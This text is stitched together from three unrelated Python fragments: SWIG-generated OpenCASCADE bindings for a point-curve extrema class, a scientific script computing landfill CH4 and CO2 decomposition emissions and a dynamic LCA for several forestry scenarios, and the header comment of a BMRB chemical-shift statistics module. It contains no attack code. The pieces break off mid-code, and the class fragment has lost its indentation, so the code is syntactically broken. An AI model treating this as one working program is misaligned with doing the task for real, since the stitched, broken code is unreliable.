        return _Extrema.Extrema_LocateExtPC2d_SquareDistance(self, *args)
    def IsMin(self, *args):
        """
        :rtype: bool
        """
        return _Extrema.Extrema_LocateExtPC2d_IsMin(self, *args)
    def Point(self, *args):
        """
        :rtype: Extrema_POnCurv2d
        """
        return _Extrema.Extrema_LocateExtPC2d_Point(self, *args)
    __swig_destroy__ = _Extrema.delete_Extrema_LocateExtPC2d
# Bind C-level implementations as instance methods and register the proxy.
Extrema_LocateExtPC2d.Initialize = new_instancemethod(_Extrema.Extrema_LocateExtPC2d_Initialize,None,Extrema_LocateExtPC2d)
Extrema_LocateExtPC2d.Perform = new_instancemethod(_Extrema.Extrema_LocateExtPC2d_Perform,None,Extrema_LocateExtPC2d)
Extrema_LocateExtPC2d.IsDone = new_instancemethod(_Extrema.Extrema_LocateExtPC2d_IsDone,None,Extrema_LocateExtPC2d)
Extrema_LocateExtPC2d.SquareDistance = new_instancemethod(_Extrema.Extrema_LocateExtPC2d_SquareDistance,None,Extrema_LocateExtPC2d)
Extrema_LocateExtPC2d.IsMin = new_instancemethod(_Extrema.Extrema_LocateExtPC2d_IsMin,None,Extrema_LocateExtPC2d)
Extrema_LocateExtPC2d.Point = new_instancemethod(_Extrema.Extrema_LocateExtPC2d_Point,None,Extrema_LocateExtPC2d)
Extrema_LocateExtPC2d_swigregister = _Extrema.Extrema_LocateExtPC2d_swigregister
Extrema_LocateExtPC2d_swigregister(Extrema_LocateExtPC2d)
class Extrema_PCFOfEPCOfELPCOfLocateExtPC(object):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args):
    """
    Construct the point-curve distance function object.  Two overloads
    (SWIG merges their signatures):

    * no arguments — empty function, configured later via Initialize()/SetPoint()
    * (P, C) — bound immediately to a point and a curve

    :param P:
    :type P: gp_Pnt
    :param C:
    :type C: Adaptor3d_Curve &
    :rtype: None
    """
    _Extrema.Extrema_PCFOfEPCOfELPCOfLocateExtPC_swiginit(self,_Extrema.new_Extrema_PCFOfEPCOfELPCOfLocateExtPC(*args))
def Initialize(self, *args):
    """
    Bind the function to the curve that Value()/Derivative() evaluations
    will be computed against.

    :param C: target curve
    :type C: Adaptor3d_Curve &
    :rtype: None
    """
    return _Extrema.Extrema_PCFOfEPCOfELPCOfLocateExtPC_Initialize(self, *args)
def SetPoint(self, | |
of the year (esp. from 'year 1' onward),
#we have to replace the positive numbers with 0 values (https://stackoverflow.com/questions/36310897/how-do-i-change-all-negative-numbers-to-zero-in-python/36310913)
# Keep only the negative year-to-year differences (emissions), then flip sign.
subs_matrix_CH4_S1_Tgr_60y = subs_matrix_CH4_S1_Tgr_60y.clip(max=0)
print(subs_matrix_CH4_S1_Tgr_60y[:,:4])
#make the results as absolute values
subs_matrix_CH4_S1_Tgr_60y = abs(subs_matrix_CH4_S1_Tgr_60y)
print(subs_matrix_CH4_S1_Tgr_60y[:,:4])
#insert row of zeros into the first row of the subs_matrix
# len(t)-200 == 1 here (tf == 201), i.e. exactly one zero row is prepended.
zero_matrix_CH4_S1_Tgr_60y = np.zeros((len(t)-200,len(df['Landfill_decomp_CH4'].values)))
print(zero_matrix_CH4_S1_Tgr_60y)
subs_matrix_CH4_S1_Tgr_60y = np.vstack((zero_matrix_CH4_S1_Tgr_60y, subs_matrix_CH4_S1_Tgr_60y))
print(subs_matrix_CH4_S1_Tgr_60y[:,:4])
#sum every column of the subs_matrix into one vector matrix
# NOTE: despite the name, matrix_tot_* is only the (rows, cols) shape tuple
# handed to np.zeros below, not a matrix.
matrix_tot_CH4_S1_Tgr_60y = (tf,1)
decomp_tot_CH4_S1_Tgr_60y = np.zeros(matrix_tot_CH4_S1_Tgr_60y)
i = 0
while i < tf:
    decomp_tot_CH4_S1_Tgr_60y[:,0] = decomp_tot_CH4_S1_Tgr_60y[:,0] + subs_matrix_CH4_S1_Tgr_60y[:,i]
    i = i + 1
print(decomp_tot_CH4_S1_Tgr_60y[:,0])
#E
# Scenario E_Hbr_40y: CH4 release from landfill decomposition.
df = pd.read_excel('C:\\Work\\Programming\\Practice\\DL_FP.xlsx', 'DL_FP_E_Hbr_40y')
tf = 201
t = np.arange(tf)
def decomp_CH4_E_Hbr_40y(t,remainAGB_CH4_E_Hbr_40y):
    # First-order decay; uses the module-level rate constant k.
    # NOTE: (1-(1-exp(-k*t))) is algebraically just exp(-k*t).
    return (1-(1-np.exp(-k*t)))*remainAGB_CH4_E_Hbr_40y
#set zero matrix
output_decomp_CH4_E_Hbr_40y = np.zeros((len(t),len(df['Landfill_decomp_CH4'].values)))
# Column i holds the decay curve of the cohort deposited in year i,
# shifted so it starts at row i.
for i,remain_part_CH4_E_Hbr_40y in enumerate(df['Landfill_decomp_CH4'].values):
    #print(i,remain_part)
    output_decomp_CH4_E_Hbr_40y[i:,i] = decomp_CH4_E_Hbr_40y(t[:len(t)-i],remain_part_CH4_E_Hbr_40y)
print(output_decomp_CH4_E_Hbr_40y[:,:4])
#find the yearly emissions from decomposition by calculating the differences between elements in list 'decomp_tot_S1'
#(https://stackoverflow.com/questions/5314241/difference-between-consecutive-elements-in-list)
# https://stackoverflow.com/questions/11095892/numpy-difference-between-neighboring-elements
#difference between element,
# NOTE(review): the '-1' sits inside '.values-1' (elementwise subtraction,
# which len() ignores) rather than 'len(...)-1'; the column count is
# therefore unchanged, which the while-loop below relies on — do not
# "fix" the parenthesization without also changing the loop bound.
subs_matrix_CH4_E_Hbr_40y = np.zeros((len(t)-1,len(df['Landfill_decomp_CH4'].values-1)))
i = 0
while i < tf:
    subs_matrix_CH4_E_Hbr_40y[:,i] = np.diff(output_decomp_CH4_E_Hbr_40y[:,i])
    i = i + 1
print(subs_matrix_CH4_E_Hbr_40y[:,:4])
print(len(subs_matrix_CH4_E_Hbr_40y))
#since there is no carbon emission from decomposition at the beginning of the year (esp. from 'year 1' onward),
#we have to replace the positive numbers with 0 values (https://stackoverflow.com/questions/36310897/how-do-i-change-all-negative-numbers-to-zero-in-python/36310913)
subs_matrix_CH4_E_Hbr_40y = subs_matrix_CH4_E_Hbr_40y.clip(max=0)
print(subs_matrix_CH4_E_Hbr_40y[:,:4])
#make the results as absolute values
subs_matrix_CH4_E_Hbr_40y = abs(subs_matrix_CH4_E_Hbr_40y)
print(subs_matrix_CH4_E_Hbr_40y[:,:4])
#insert row of zeros into the first row of the subs_matrix
zero_matrix_CH4_E_Hbr_40y = np.zeros((len(t)-200,len(df['Landfill_decomp_CH4'].values)))
print(zero_matrix_CH4_E_Hbr_40y)
subs_matrix_CH4_E_Hbr_40y = np.vstack((zero_matrix_CH4_E_Hbr_40y, subs_matrix_CH4_E_Hbr_40y))
print(subs_matrix_CH4_E_Hbr_40y[:,:4])
#sum every column of the subs_matrix into one vector matrix
matrix_tot_CH4_E_Hbr_40y = (tf,1)
decomp_tot_CH4_E_Hbr_40y = np.zeros(matrix_tot_CH4_E_Hbr_40y)
i = 0
while i < tf:
    decomp_tot_CH4_E_Hbr_40y[:,0] = decomp_tot_CH4_E_Hbr_40y[:,0] + subs_matrix_CH4_E_Hbr_40y[:,i]
    i = i + 1
print(decomp_tot_CH4_E_Hbr_40y[:,0])
#plotting
# Overlay the yearly CH4 decomposition emissions of all five scenarios.
t = np.arange(0,tf)
plt.plot(t,decomp_tot_CH4_S1_Ac_7y,label='Ac_7y')
plt.plot(t,decomp_tot_CH4_S1_Ac_18y,label='Ac_18y')
plt.plot(t,decomp_tot_CH4_S1_Tgr_40y,label='Tgr_40y')
plt.plot(t,decomp_tot_CH4_S1_Tgr_60y,label='Tgr_60y')
plt.plot(t,decomp_tot_CH4_E_Hbr_40y,label='E_Hbr_40y')
plt.xlim(0,200)
plt.legend(bbox_to_anchor=(1.04,1), loc="upper left", frameon=False)
plt.show()
#%%
#Step (7_2): landfill gas decomposition (CO2)
#CO2 decomposition
hl = 20 #half-live
# Rebinds the module-level decay constant k; every decomp_* function defined
# from here on therefore uses the CO2 half-life, not the CH4 one above.
k = (np.log(2))/hl
#S1_Ac_7y
df = pd.read_excel('C:\\Work\\Programming\\Practice\\DL_FP.xlsx', 'DL_FP_S1_Ac_7y')
tf = 201
t = np.arange(tf)
def decomp_S1_Ac_7y(t,remainAGB_S1_Ac_7y):
    # First-order decay ((1-(1-exp(-k*t))) == exp(-k*t)).
    return (1-(1-np.exp(-k*t)))*remainAGB_S1_Ac_7y
#set zero matrix
output_decomp_S1_Ac_7y = np.zeros((len(t),len(df['Landfill_decomp_CO2'].values)))
for i,remain_part_S1_Ac_7y in enumerate(df['Landfill_decomp_CO2'].values):
    #print(i,remain_part)
    output_decomp_S1_Ac_7y[i:,i] = decomp_S1_Ac_7y(t[:len(t)-i],remain_part_S1_Ac_7y)
print(output_decomp_S1_Ac_7y[:,:4])
#find the yearly emissions from decomposition by calculating the differences between elements in list 'decomp_tot_S1'
#(https://stackoverflow.com/questions/5314241/difference-between-consecutive-elements-in-list)
# https://stackoverflow.com/questions/11095892/numpy-difference-between-neighboring-elements
#difference between element,
# (the '-1' inside '.values-1' is elementwise and does not change len(); see note in the CH4 section)
subs_matrix_S1_Ac_7y = np.zeros((len(t)-1,len(df['Landfill_decomp_CO2'].values-1)))
i = 0
while i < tf:
    subs_matrix_S1_Ac_7y[:,i] = np.diff(output_decomp_S1_Ac_7y[:,i])
    i = i + 1
print(subs_matrix_S1_Ac_7y[:,:4])
print(len(subs_matrix_S1_Ac_7y))
#since there is no carbon emission from decomposition at the beginning of the year (esp. from 'year 1' onward),
#we have to replace the positive numbers with 0 values (https://stackoverflow.com/questions/36310897/how-do-i-change-all-negative-numbers-to-zero-in-python/36310913)
subs_matrix_S1_Ac_7y = subs_matrix_S1_Ac_7y.clip(max=0)
print(subs_matrix_S1_Ac_7y[:,:4])
#make the results as absolute values
subs_matrix_S1_Ac_7y = abs(subs_matrix_S1_Ac_7y)
print(subs_matrix_S1_Ac_7y[:,:4])
#insert row of zeros into the first row of the subs_matrix
zero_matrix_S1_Ac_7y = np.zeros((len(t)-200,len(df['Landfill_decomp_CO2'].values)))
print(zero_matrix_S1_Ac_7y)
subs_matrix_S1_Ac_7y = np.vstack((zero_matrix_S1_Ac_7y, subs_matrix_S1_Ac_7y))
print(subs_matrix_S1_Ac_7y[:,:4])
#sum every column of the subs_matrix into one vector matrix
matrix_tot_S1_Ac_7y = (tf,1)
decomp_tot_CO2_S1_Ac_7y = np.zeros(matrix_tot_S1_Ac_7y)
i = 0
while i < tf:
    decomp_tot_CO2_S1_Ac_7y[:,0] = decomp_tot_CO2_S1_Ac_7y[:,0] + subs_matrix_S1_Ac_7y[:,i]
    i = i + 1
print(decomp_tot_CO2_S1_Ac_7y[:,0])
#S1_Ac_18y
# Same CO2 pipeline as S1_Ac_7y, applied to the 'DL_FP_S1_Ac_18y' sheet.
df = pd.read_excel('C:\\Work\\Programming\\Practice\\DL_FP.xlsx', 'DL_FP_S1_Ac_18y')
tf = 201
t = np.arange(tf)
def decomp_S1_Ac_18y(t,remainAGB_S1_Ac_18y):
    return (1-(1-np.exp(-k*t)))*remainAGB_S1_Ac_18y
#set zero matrix
output_decomp_S1_Ac_18y = np.zeros((len(t),len(df['Landfill_decomp_CO2'].values)))
for i,remain_part_S1_Ac_18y in enumerate(df['Landfill_decomp_CO2'].values):
    #print(i,remain_part)
    output_decomp_S1_Ac_18y[i:,i] = decomp_S1_Ac_18y(t[:len(t)-i],remain_part_S1_Ac_18y)
print(output_decomp_S1_Ac_18y[:,:4])
#find the yearly emissions from decomposition by calculating the differences between elements in list 'decomp_tot_S1'
#(https://stackoverflow.com/questions/5314241/difference-between-consecutive-elements-in-list)
# https://stackoverflow.com/questions/11095892/numpy-difference-between-neighboring-elements
#difference between element,
subs_matrix_S1_Ac_18y = np.zeros((len(t)-1,len(df['Landfill_decomp_CO2'].values-1)))
i = 0
while i < tf:
    subs_matrix_S1_Ac_18y[:,i] = np.diff(output_decomp_S1_Ac_18y[:,i])
    i = i + 1
print(subs_matrix_S1_Ac_18y[:,:4])
print(len(subs_matrix_S1_Ac_18y))
#since there is no carbon emission from decomposition at the beginning of the year (esp. from 'year 1' onward),
#we have to replace the positive numbers with 0 values (https://stackoverflow.com/questions/36310897/how-do-i-change-all-negative-numbers-to-zero-in-python/36310913)
subs_matrix_S1_Ac_18y = subs_matrix_S1_Ac_18y.clip(max=0)
print(subs_matrix_S1_Ac_18y[:,:4])
#make the results as absolute values
subs_matrix_S1_Ac_18y = abs(subs_matrix_S1_Ac_18y)
print(subs_matrix_S1_Ac_18y[:,:4])
#insert row of zeros into the first row of the subs_matrix
zero_matrix_S1_Ac_18y = np.zeros((len(t)-200,len(df['Landfill_decomp_CO2'].values)))
print(zero_matrix_S1_Ac_18y)
subs_matrix_S1_Ac_18y = np.vstack((zero_matrix_S1_Ac_18y, subs_matrix_S1_Ac_18y))
print(subs_matrix_S1_Ac_18y[:,:4])
#sum every column of the subs_matrix into one vector matrix
matrix_tot_S1_Ac_18y = (tf,1)
decomp_tot_CO2_S1_Ac_18y = np.zeros(matrix_tot_S1_Ac_18y)
i = 0
while i < tf:
    decomp_tot_CO2_S1_Ac_18y[:,0] = decomp_tot_CO2_S1_Ac_18y[:,0] + subs_matrix_S1_Ac_18y[:,i]
    i = i + 1
print(decomp_tot_CO2_S1_Ac_18y[:,0])
#S1_Tgr_40y
# Same CO2 pipeline, applied to the 'DL_FP_S1_Tgr_40y' sheet.
df = pd.read_excel('C:\\Work\\Programming\\Practice\\DL_FP.xlsx', 'DL_FP_S1_Tgr_40y')
tf = 201
t = np.arange(tf)
def decomp_S1_Tgr_40y(t,remainAGB_S1_Tgr_40y):
    return (1-(1-np.exp(-k*t)))*remainAGB_S1_Tgr_40y
#set zero matrix
output_decomp_S1_Tgr_40y = np.zeros((len(t),len(df['Landfill_decomp_CO2'].values)))
for i,remain_part_S1_Tgr_40y in enumerate(df['Landfill_decomp_CO2'].values):
    #print(i,remain_part)
    output_decomp_S1_Tgr_40y[i:,i] = decomp_S1_Tgr_40y(t[:len(t)-i],remain_part_S1_Tgr_40y)
print(output_decomp_S1_Tgr_40y[:,:4])
#find the yearly emissions from decomposition by calculating the differences between elements in list 'decomp_tot_S1'
#(https://stackoverflow.com/questions/5314241/difference-between-consecutive-elements-in-list)
# https://stackoverflow.com/questions/11095892/numpy-difference-between-neighboring-elements
#difference between element,
subs_matrix_S1_Tgr_40y = np.zeros((len(t)-1,len(df['Landfill_decomp_CO2'].values-1)))
i = 0
while i < tf:
    subs_matrix_S1_Tgr_40y[:,i] = np.diff(output_decomp_S1_Tgr_40y[:,i])
    i = i + 1
print(subs_matrix_S1_Tgr_40y[:,:4])
print(len(subs_matrix_S1_Tgr_40y))
#since there is no carbon emission from decomposition at the beginning of the year (esp. from 'year 1' onward),
#we have to replace the positive numbers with 0 values (https://stackoverflow.com/questions/36310897/how-do-i-change-all-negative-numbers-to-zero-in-python/36310913)
subs_matrix_S1_Tgr_40y = subs_matrix_S1_Tgr_40y.clip(max=0)
print(subs_matrix_S1_Tgr_40y[:,:4])
#make the results as absolute values
subs_matrix_S1_Tgr_40y = abs(subs_matrix_S1_Tgr_40y)
print(subs_matrix_S1_Tgr_40y[:,:4])
#insert row of zeros into the first row of the subs_matrix
zero_matrix_S1_Tgr_40y = np.zeros((len(t)-200,len(df['Landfill_decomp_CO2'].values)))
print(zero_matrix_S1_Tgr_40y)
subs_matrix_S1_Tgr_40y = np.vstack((zero_matrix_S1_Tgr_40y, subs_matrix_S1_Tgr_40y))
print(subs_matrix_S1_Tgr_40y[:,:4])
#sum every column of the subs_matrix into one vector matrix
matrix_tot_S1_Tgr_40y = (tf,1)
decomp_tot_CO2_S1_Tgr_40y = np.zeros(matrix_tot_S1_Tgr_40y)
i = 0
while i < tf:
    decomp_tot_CO2_S1_Tgr_40y[:,0] = decomp_tot_CO2_S1_Tgr_40y[:,0] + subs_matrix_S1_Tgr_40y[:,i]
    i = i + 1
print(decomp_tot_CO2_S1_Tgr_40y[:,0])
#S1_Tgr_60y  (comment fixed: original said S2, but all names below are S1)
# Same CO2 pipeline, applied to the 'DL_FP_S1_Tgr_60y' sheet.
df = pd.read_excel('C:\\Work\\Programming\\Practice\\DL_FP.xlsx', 'DL_FP_S1_Tgr_60y')
tf = 201
t = np.arange(tf)
def decomp_S1_Tgr_60y(t,remainAGB_S1_Tgr_60y):
    return (1-(1-np.exp(-k*t)))*remainAGB_S1_Tgr_60y
#set zero matrix
output_decomp_S1_Tgr_60y = np.zeros((len(t),len(df['Landfill_decomp_CO2'].values)))
for i,remain_part_S1_Tgr_60y in enumerate(df['Landfill_decomp_CO2'].values):
    #print(i,remain_part)
    output_decomp_S1_Tgr_60y[i:,i] = decomp_S1_Tgr_60y(t[:len(t)-i],remain_part_S1_Tgr_60y)
print(output_decomp_S1_Tgr_60y[:,:4])
#find the yearly emissions from decomposition by calculating the differences between elements in list 'decomp_tot_S1'
#(https://stackoverflow.com/questions/5314241/difference-between-consecutive-elements-in-list)
# https://stackoverflow.com/questions/11095892/numpy-difference-between-neighboring-elements
#difference between element,
subs_matrix_S1_Tgr_60y = np.zeros((len(t)-1,len(df['Landfill_decomp_CO2'].values-1)))
i = 0
while i < tf:
    subs_matrix_S1_Tgr_60y[:,i] = np.diff(output_decomp_S1_Tgr_60y[:,i])
    i = i + 1
print(subs_matrix_S1_Tgr_60y[:,:4])
print(len(subs_matrix_S1_Tgr_60y))
#since there is no carbon emission from decomposition at the beginning of the year (esp. from 'year 1' onward),
#we have to replace the positive numbers with 0 values (https://stackoverflow.com/questions/36310897/how-do-i-change-all-negative-numbers-to-zero-in-python/36310913)
subs_matrix_S1_Tgr_60y = subs_matrix_S1_Tgr_60y.clip(max=0)
print(subs_matrix_S1_Tgr_60y[:,:4])
#make the results as absolute values
subs_matrix_S1_Tgr_60y = abs(subs_matrix_S1_Tgr_60y)
print(subs_matrix_S1_Tgr_60y[:,:4])
#insert row of zeros into the first row of the subs_matrix
zero_matrix_S1_Tgr_60y = np.zeros((len(t)-200,len(df['Landfill_decomp_CO2'].values)))
print(zero_matrix_S1_Tgr_60y)
subs_matrix_S1_Tgr_60y = np.vstack((zero_matrix_S1_Tgr_60y, subs_matrix_S1_Tgr_60y))
print(subs_matrix_S1_Tgr_60y[:,:4])
#sum every column of the subs_matrix into one vector matrix
matrix_tot_S1_Tgr_60y = (tf,1)
decomp_tot_CO2_S1_Tgr_60y = np.zeros(matrix_tot_S1_Tgr_60y)
i = 0
while i < tf:
    decomp_tot_CO2_S1_Tgr_60y[:,0] = decomp_tot_CO2_S1_Tgr_60y[:,0] + subs_matrix_S1_Tgr_60y[:,i]
    i = i + 1
print(decomp_tot_CO2_S1_Tgr_60y[:,0])
#E
# Same CO2 pipeline, applied to the 'DL_FP_E_Hbr_40y' sheet.
df = pd.read_excel('C:\\Work\\Programming\\Practice\\DL_FP.xlsx', 'DL_FP_E_Hbr_40y')
tf = 201
t = np.arange(tf)
def decomp_E_Hbr_40y(t,remainAGB_E_Hbr_40y):
    return (1-(1-np.exp(-k*t)))*remainAGB_E_Hbr_40y
#set zero matrix
output_decomp_E_Hbr_40y = np.zeros((len(t),len(df['Landfill_decomp_CO2'].values)))
for i,remain_part_E_Hbr_40y in enumerate(df['Landfill_decomp_CO2'].values):
    #print(i,remain_part)
    output_decomp_E_Hbr_40y[i:,i] = decomp_E_Hbr_40y(t[:len(t)-i],remain_part_E_Hbr_40y)
print(output_decomp_E_Hbr_40y[:,:4])
#find the yearly emissions from decomposition by calculating the differences between elements in list 'decomp_tot_S1'
#(https://stackoverflow.com/questions/5314241/difference-between-consecutive-elements-in-list)
# https://stackoverflow.com/questions/11095892/numpy-difference-between-neighboring-elements
#difference between element,
subs_matrix_E_Hbr_40y = np.zeros((len(t)-1,len(df['Landfill_decomp_CO2'].values-1)))
i = 0
while i < tf:
    subs_matrix_E_Hbr_40y[:,i] = np.diff(output_decomp_E_Hbr_40y[:,i])
    i = i + 1
print(subs_matrix_E_Hbr_40y[:,:4])
print(len(subs_matrix_E_Hbr_40y))
#since there is no carbon emission from decomposition at the beginning of the year (esp. from 'year 1' onward),
#we have to replace the positive numbers with 0 values (https://stackoverflow.com/questions/36310897/how-do-i-change-all-negative-numbers-to-zero-in-python/36310913)
subs_matrix_E_Hbr_40y = subs_matrix_E_Hbr_40y.clip(max=0)
print(subs_matrix_E_Hbr_40y[:,:4])
#make the results as absolute values
subs_matrix_E_Hbr_40y = abs(subs_matrix_E_Hbr_40y)
print(subs_matrix_E_Hbr_40y[:,:4])
#insert row of zeros into the first row of the subs_matrix
zero_matrix_E_Hbr_40y = np.zeros((len(t)-200,len(df['Landfill_decomp_CO2'].values)))
print(zero_matrix_E_Hbr_40y)
subs_matrix_E_Hbr_40y = np.vstack((zero_matrix_E_Hbr_40y, subs_matrix_E_Hbr_40y))
print(subs_matrix_E_Hbr_40y[:,:4])
#sum every column of the subs_matrix into one vector matrix
matrix_tot_E_Hbr_40y = (tf,1)
decomp_tot_CO2_E_Hbr_40y = np.zeros(matrix_tot_E_Hbr_40y)
i = 0
while i < tf:
    decomp_tot_CO2_E_Hbr_40y[:,0] = decomp_tot_CO2_E_Hbr_40y[:,0] + subs_matrix_E_Hbr_40y[:,i]
    i = i + 1
print(decomp_tot_CO2_E_Hbr_40y[:,0])
#plotting
# Overlay the yearly CO2 decomposition emissions of all five scenarios.
t = np.arange(0,tf)
plt.plot(t,decomp_tot_CO2_S1_Ac_7y,label='Ac_7y')
plt.plot(t,decomp_tot_CO2_S1_Ac_18y,label='Ac_18y')
plt.plot(t,decomp_tot_CO2_S1_Tgr_40y,label='Tgr_40y')
plt.plot(t,decomp_tot_CO2_S1_Tgr_60y,label='Tgr_60y')
plt.plot(t,decomp_tot_CO2_E_Hbr_40y,label='E_Hbr_40y')
plt.xlim(0,200)
plt.legend(bbox_to_anchor=(1.04,1), loc="upper left", frameon=False)
plt.show()
#%%
#Step (8): Sum the emissions and sequestration (net carbon balance), CO2 and CH4 are separated
#https://stackoverflow.com/questions/52703442/python-sum-values-from-multiple-lists-more-than-two
#C_loss + C_remainAGB + C_remainHWP + PH_Emissions_PO
# Each Emissions_* list collects the per-year emission series of one scenario;
# zip(*...) below adds them element-wise (and truncates to the shortest series).
Emissions_S1_Ac_7y = [c_firewood_energy_S1_Ac7, decomp_tot_S1_Ac_7y[:,0], TestDSM1_Ac7.o, PH_Emissions_HWP1_Ac_7y, decomp_tot_CO2_S1_Ac_7y[:,0]]
Emissions_S1_Ac_18y = [c_firewood_energy_S1_Ac18, decomp_tot_S1_Ac_18y[:,0], TestDSM1_Ac18.o, PH_Emissions_HWP1_Ac_18y, decomp_tot_CO2_S1_Ac_18y[:,0]]
Emissions_S1_Tgr_40y = [c_firewood_energy_S1_Tgr40, decomp_tot_S1_Tgr_40y[:,0], TestDSM1_Tgr40.o, PH_Emissions_HWP1_Tgr_40y, decomp_tot_CO2_S1_Tgr_40y[:,0]]
Emissions_S1_Tgr_60y = [c_firewood_energy_S1_Tgr60, decomp_tot_S1_Tgr_60y[:,0], TestDSM1_Tgr60.o, PH_Emissions_HWP1_Tgr_60y, decomp_tot_CO2_S1_Tgr_60y[:,0]]
# Scenario E additionally includes the pellets stream (c_pellets_Hbr_40y).
Emissions_E_Hbr_40y = [c_firewood_energy_E_Hbr40, c_pellets_Hbr_40y, decomp_tot_E_Hbr_40y[:,0], TestDSME_Hbr40.o, PH_Emissions_HWPE_Hbr_40y, decomp_tot_CO2_E_Hbr_40y[:,0]]
Emissions_DL_FP_S1_Ac_7y = [sum(x) for x in zip(*Emissions_S1_Ac_7y)]
Emissions_DL_FP_S1_Ac_18y = [sum(x) for x in zip(*Emissions_S1_Ac_18y)]
Emissions_DL_FP_S1_Tgr_40y = [sum(x) for x in zip(*Emissions_S1_Tgr_40y)]
Emissions_DL_FP_S1_Tgr_60y = [sum(x) for x in zip(*Emissions_S1_Tgr_60y)]
Emissions_DL_FP_E_Hbr_40y = [sum(x) for x in zip(*Emissions_E_Hbr_40y)]
# CH4 is kept separate; only landfill decomposition emits it.
#CH4_S1_Ac_7y
Emissions_CH4_DL_FP_S1_Ac_7y = decomp_tot_CH4_S1_Ac_7y[:,0]
#CH4_S1_Ac_18y
Emissions_CH4_DL_FP_S1_Ac_18y = decomp_tot_CH4_S1_Ac_18y[:,0]
#CH4_S1_Tgr_40y
Emissions_CH4_DL_FP_S1_Tgr_40y = decomp_tot_CH4_S1_Tgr_40y[:,0]
#CH4_S1_Tgr_60y
Emissions_CH4_DL_FP_S1_Tgr_60y = decomp_tot_CH4_S1_Tgr_60y[:,0]
#CH4_E_Hbr_40y
Emissions_CH4_DL_FP_E_Hbr_40y = decomp_tot_CH4_E_Hbr_40y[:,0]
#%%
#Step (9): Generate the excel file (emissions_seq_scenarios.xlsx) from Step (8) calculation
#print year column
# Idiomatic replacements for the original append-loop and
# itertools.chain/repeat constructions; the resulting lists are identical.
year = list(range(tf))
print (year)
#print CH4 emission column
import itertools  # kept: imported here in the original script
# Reference system emits no CH4: a column of tf zeros.
Emissions_CH4 = [0] * tf
print(Emissions_CH4)
#print emission ref
Emission_ref = [0] * tf
print(Emission_ref)
#replace the first element with 1 to denote the emission reference as year 0 (for dynGWP calculation)
Emission_ref[0] = 1
print(Emission_ref)
# Assemble the output columns: Col1 = year index, Col2_* = net CO2 per
# scenario, Col3_* = CH4 per scenario, Col4 = unit-pulse reference,
# Col5..Col9 = sequestration series (flat_list_* built earlier).
Col1 = year
Col2_S1_Ac_7y = Emissions_DL_FP_S1_Ac_7y
Col2_S1_Ac_18y = Emissions_DL_FP_S1_Ac_18y
Col2_S1_Tgr_40y = Emissions_DL_FP_S1_Tgr_40y
Col2_S1_Tgr_60y = Emissions_DL_FP_S1_Tgr_60y
Col2_E_Hbr_40y = Emissions_DL_FP_E_Hbr_40y
Col3_S1_Ac_7y = Emissions_CH4_DL_FP_S1_Ac_7y
Col3_S1_Ac_18y = Emissions_CH4_DL_FP_S1_Ac_18y
Col3_S1_Tgr_40y = Emissions_CH4_DL_FP_S1_Tgr_40y
Col3_S1_Tgr_60y = Emissions_CH4_DL_FP_S1_Tgr_60y
Col3_E_Hbr_40y = Emissions_CH4_DL_FP_E_Hbr_40y
Col4 = Emission_ref
Col5 = flat_list_Ac_7y
Col6 = flat_list_Ac_18y
Col7 = flat_list_Tgr_40y
Col8 = flat_list_Tgr_60y
Col9 = flat_list_Hbr_40y
#<NAME>
df1_Ac_7y = pd.DataFrame.from_dict({'Year':Col1,'kg_CO2':Col2_S1_Ac_7y,'kg_CH4':Col3_S1_Ac_7y,'kg_CO2_seq':Col5,'emission_ref':Col4})
df1_Ac_18y = pd.DataFrame.from_dict({'Year':Col1,'kg_CO2':Col2_S1_Ac_18y,'kg_CH4':Col3_S1_Ac_18y,'kg_CO2_seq':Col6,'emission_ref':Col4})
#<NAME>
df1_Tgr_40y = pd.DataFrame.from_dict({'Year':Col1,'kg_CO2':Col2_S1_Tgr_40y,'kg_CH4':Col3_S1_Tgr_40y,'kg_CO2_seq':Col7,'emission_ref':Col4})
df1_Tgr_60y = pd.DataFrame.from_dict({'Year':Col1,'kg_CO2':Col2_S1_Tgr_60y,'kg_CH4':Col3_S1_Tgr_60y,'kg_CO2_seq':Col8,'emission_ref':Col4})
#<NAME>
dfE_Hbr_40y = pd.DataFrame.from_dict({'Year':Col1,'kg_CO2':Col2_E_Hbr_40y,'kg_CH4':Col3_E_Hbr_40y,'kg_CO2_seq':Col9,'emission_ref':Col4})
# One sheet per scenario in a single workbook.
# NOTE(review): ExcelWriter.save() is deprecated/removed in recent pandas;
# close() alone suffices there — confirm the pinned pandas version.
writer = pd.ExcelWriter('emissions_seq_DL_FP_S1.xlsx', engine = 'xlsxwriter')
df1_Ac_7y.to_excel(writer, sheet_name = 'DL_FP_S1_Ac_7y', header=True, index=False )
df1_Ac_18y.to_excel(writer, sheet_name = 'DL_FP_S1_Ac_18y', header=True, index=False)
df1_Tgr_40y.to_excel(writer, sheet_name = 'DL_FP_S1_Tgr_40y', header=True, index=False)
df1_Tgr_60y.to_excel(writer, sheet_name = 'DL_FP_S1_Tgr_60y', header=True, index=False)
dfE_Hbr_40y.to_excel(writer, sheet_name = 'DL_FP_E_Hbr_40y', header=True, index=False)
writer.save()
writer.close()
#df1.to_excel('test.xlsx', 'nuclues', header=True, index=False)
#df2.to_excel('test.xlsx', 'plasma', header=True, index=False)
#%%
## DYNAMIC LCA
# Step (10): general parameters for the dynamic LCA calculation.
# Instantaneous radiative-forcing coefficients and lifetimes follow the
# Bern carbon cycle-climate model.
aCH4 = 0.129957e-12   # methane - instantaneous radiative forcing per unit mass [W/m2 /kgCH4]
TauCH4 = 12           # methane - lifetime (years)
aCO2 = 0.0018088e-12  # CO2 - instantaneous radiative forcing per unit mass [W/m2 /kgCO2]
TauCO2 = [172.9, 18.51, 1.186]  # CO2 decay time constants (Bern model)
aBern = [0.259, 0.338, 0.186]   # CO2 pool weights (Bern model)
a0Bern = 0.217                  # CO2 permanent-fraction weight (Bern model)
# tf = 202 so that DCF(t-i) reaches DCF(201), i.e. the impact of an emission
# in year 200 is captured (there is no DCF(0)).
tf = 202
#%%
#Step (11): Bern 2.5 CC Model, determine atmospheric load (C(t)) for GHG (CO2 and | |
##
# File: BMRBChemShiftStat.py
# Date: 20-Sep-2019
#
# Updates:
# 26-Feb-2020 <NAME> - load csv resource files if pickle is not available
# 04-Mar-2020 <NAME> - support lazy import of others (non-standard residues, DAOTHER-5498)
# 16-Apr-2020 <NAME> - fix ambiguity code of atom name starts with 'Q' (e.g. LYZ:QZ)
# 20-Nov-2020 <NAME> - fix statics extraction for HEM, HEB, HEC from CSV (DAOTHER-6366)
